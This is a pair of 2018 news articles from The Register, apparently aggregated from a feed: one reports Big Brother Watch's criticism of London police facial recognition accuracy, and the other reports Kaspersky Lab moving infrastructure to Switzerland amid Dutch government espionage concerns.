Article source: http://feedproxy.google.com/~r/nakedsecurity/~3/cVzqwCsNSFo/

Zero arrests, 2 correct matches, no criminals: London cops’ facial recog tech slammed

London cops’ facial recognition kit has only correctly identified two people to date – neither of whom were criminals – and the force has made no arrests using it, figures published today revealed.

According to information released under Freedom of Information laws, the Metropolitan Police’s automated facial recognition (AFR) technology has a 98 per cent false positive rate.

That figure is the highest of those given by UK police forces surveyed by the campaign group Big Brother Watch as part of a report that urges the police to stop using the tech immediately.

Forces use facial recognition in two ways: one is after the fact, cross-checking images against mugshots held in national databases; the other involves real-time scanning of people’s faces in a crowd to compare against a “watch list” that is freshly drawn up for each event.

Big Brother Watch’s report focused on the latter, which it said breaches human rights laws as it surveils people without their knowledge and might dissuade them from attending public events.

And, despite cops’ insistence that it works, the report showed an average false positive rate – where the system “identifies” someone not on the list – of 91 per cent across the country.

The Met has the highest, at 98 per cent, with 35 false positives recorded in one day alone, at the Notting Hill Carnival 2017.

However, the Met Police claimed that this figure is misleading because there is human intervention after the system flags up the match.

“We do not consider these as false positive matches because additional checks and balances are in place to confirm identification following system alerts,” a spokesperson told The Register.

The system, though, hasn’t had much success in positive identifications either: the report showed there have been just two accurate matches, and neither person was a criminal.

The first was at Notting Hill, but the person identified was no longer wanted for arrest because the information used to generate the watch list was out of date.

The second such identification took place during last year’s Remembrance Sunday event, but this was someone known as a “fixated individual” – a person known to frequently contact public figures – who was not a criminal and not wanted for arrest.

Typically people on this list have mental health issues, and Big Brother Watch expressed concern that the police said there had not been prior consultation with mental health professionals about cross-matching against people in this database.

The group described this as a “chilling example of function creep” and an example of the dangerous effect it could have on the rights of marginalised people.

It also raised concerns about racial bias in the kit used, criticising the Met Police for saying it would not record ethnicity figures for the number of individuals identified, either correctly or not.

As a result, it said, “any demographic disproportionality in this hi-tech policing will remain unaccountable and hidden from public view”.

This is compounded by the fact that the commercial software used by the Met – and also South Wales Police (SWP) – has yet to be tested for demographic accuracy biases.

“We have been extremely disappointed to encounter resistance from the police in England and Wales to the idea that such testing is important or necessary,” Big Brother Watch said in the report.

SWP – which has used AFR at 18 public places since it was first introduced in May 2017 – has fared only slightly better.

Its false positive rate is 91 per cent, and the matches led to 15 arrests – equivalent to 0.005 per cent of matches.

The SWP said that false positives were to be expected while the technology develops, but that the accuracy was improving, and added that no one had been arrested after a false match – again because of human intervention.

“Officers can quickly establish if the person has been correctly or incorrectly matched by traditional policing methods, either by looking at the person or through a brief conversation,” a spokesperson said.

“If an incorrect match has been made, officers will explain to the individual what has happened and invite them to see the equipment along with providing them with a Fair Processing Notice.”

Underlying the concerns about the poor accuracy of the kit are complaints about a lack of clear oversight – an issue that has been raised by a number of activists, politicians and independent commissioners in related areas.

Government minister Susan Williams – who once described the use of AFR as an “operational” decision for the police – said earlier this year that the government is to create a board made up of the information, biometrics and surveillance camera commissioners to oversee the tech.

Further details are expected in the long-awaited biometrics strategy, which is slated to appear in June.

Big Brother Watch also reiterated its concerns about the mass storage of custody images of innocent people on the Police National Database, which has more than 12.5 million photos on it that can be scanned biometrically.

Despite a 2012 High Court ruling that said keeping images of presumed innocent people on file was unlawful, the government has said it isn’t possible to automate removal. This means the images remain on the system unless a person asks for theirs to be removed.

In March, Williams said that because images can only be deleted manually, weeding out innocent people “will have significant costs and be difficult to justify given the off-setting reductions forces would be required to find to fund it”.

The group had little patience with this, stating in the report the government should provide funding for administrative staff to deal with this problem – one person per force employed for a full year at £35,000 would be a total of £1.5m, it said.

“‘Costs’ are not an acceptable reason for the British Government not to comply with the law,” it said. Big Brother Watch said that given the Home Office had forked out £2.6m to SWP for its AFR kit, they were also “hardly a convincing reason”.

Big Brother Watch is launching its campaign against AFR today in Parliament. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/05/15/met_police_slammed_inaccurate_facial_recognition/

Kaspersky Lab’s move from Russia to Switzerland fails to save it from Dutch oven

It has been a busy few days for beleaguered antivirus-flinger Kaspersky Lab. Today’s confirmation of an infrastructure move to Switzerland comes hot on the heels of a comment from the Netherlands government that use of the Russian firm’s software is a bit risky.

Kaspersky is moving a number of its core processes from Russia to Switzerland as part of its “Global Transparency Initiative” (aka “Please stop being horrid about our Russian connections”).

The security outfit plans to open a data centre in Zurich by the end of 2019 which will store information on users in regions such as Europe, North America and Australia.

Before the end of 2018, Kaspersky Lab will have also shifted its “software build conveyor”, a set of tools that assembles the applications, and plans to sign its threat detection rule databases with a digital signature in Switzerland.

Transparent, like Swiss mountain water

The, er, Russian security biz also intends to use an independent third party to conduct technical code reviews and make the source code available for review by “responsible stakeholders”.

The Register contacted Kaspersky for a definition of the term, but has yet to receive a response.

Eugene Kaspersky, CEO of the eponymous software maker, said:

In a rapidly changing industry such as ours we have to adapt to the evolving needs of our clients, stakeholders and partners. Transparency is one such need, and that is why we’ve decided to redesign our infrastructure and move our data processing facilities to Switzerland. We believe such action will become a global trend for cybersecurity, and that a policy of trust will catch on across the industry as a key basic requirement.

Meanwhile, GCHQ offshoot the National Cyber Security Centre, which last year effectively banned the use of Russian antivirus products from government departments, said of the Kaspersky Lab announcement:

Whilst this does not currently change our advice on systems with a national security purpose we welcome this move. This is a move in the right direction to potentially address risks to wider UK organisations and the public.

Our conversations with Kaspersky continue and this move will be discussed as part of our ongoing dialogue.

With action under way in the US to remove Kaspersky software from government PCs, the current NCSC block on the use of its AV on systems processing information classified SECRET still in place in the UK, and Twitter turning its nose up at the firm’s ad money, the vendor is hoping that a caring, transparent image might waft away the lingering odour of Russian interference.

Dutch heat

But that may be a little too late for the government of the Netherlands. Justice Minister Ferdinand Grapperhaus has issued a letter with stern words for the Russian outfit.

In it he warned the Russian Federation has an active offensive cyber programme focused on Dutch interests and pointed out that Kaspersky is a Russian company, headquartered in Russia and so subject to Russian legislation. He said, “as a precautionary measure, [the use of] Kaspersky antivirus software [in] the national government will be phased out.”

The Dutch Cabinet feels that there is a risk of espionage through the use of Kaspersky’s products and so recommended the software is not used (aligning with the US and UK), although the even-handed politicos also pointed out that there are no concrete cases of abuse in the Netherlands.

A spokesperson from Kaspersky Lab told The Register:

Kaspersky Lab is very disappointed with this decision by the Dutch Government based on theoretical concerns… But yet again, Kaspersky Lab is caught up in a geopolitical fight and still no credible evidence of wrongdoing has been publicly presented by anyone or any organisation to justify such decisions.

Kaspersky Lab has never helped, nor will help, any government in the world with its cyberespionage or offensive cyber efforts, and it’s disconcerting that a private company can be treated as guilty merely due to geopolitical issues.

Graham Cluley, an infosec watcher, agreed that it was all rather unfortunate and perhaps a little unfair on the software maker, telling The Register:

I can’t help but feel sorry for Kaspersky. A reputation built up over 20 years has been damaged by rumours, without their accusers even having to make any evidence of wrongdoing public. I don’t know how or if they can successfully convince everyone that they can be trusted, but shifting their core infrastructure to Switzerland certainly won’t do them any harm at all.

As the US imposes hefty sanctions on a number of Russian businesses, keeping Kaspersky Lab headquartered in the Russian Federation may still be a pill too bitter to swallow for Western governments. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2018/05/15/kaspersky_labs_announces_move_to_zurich_dutch_government_questions_firm/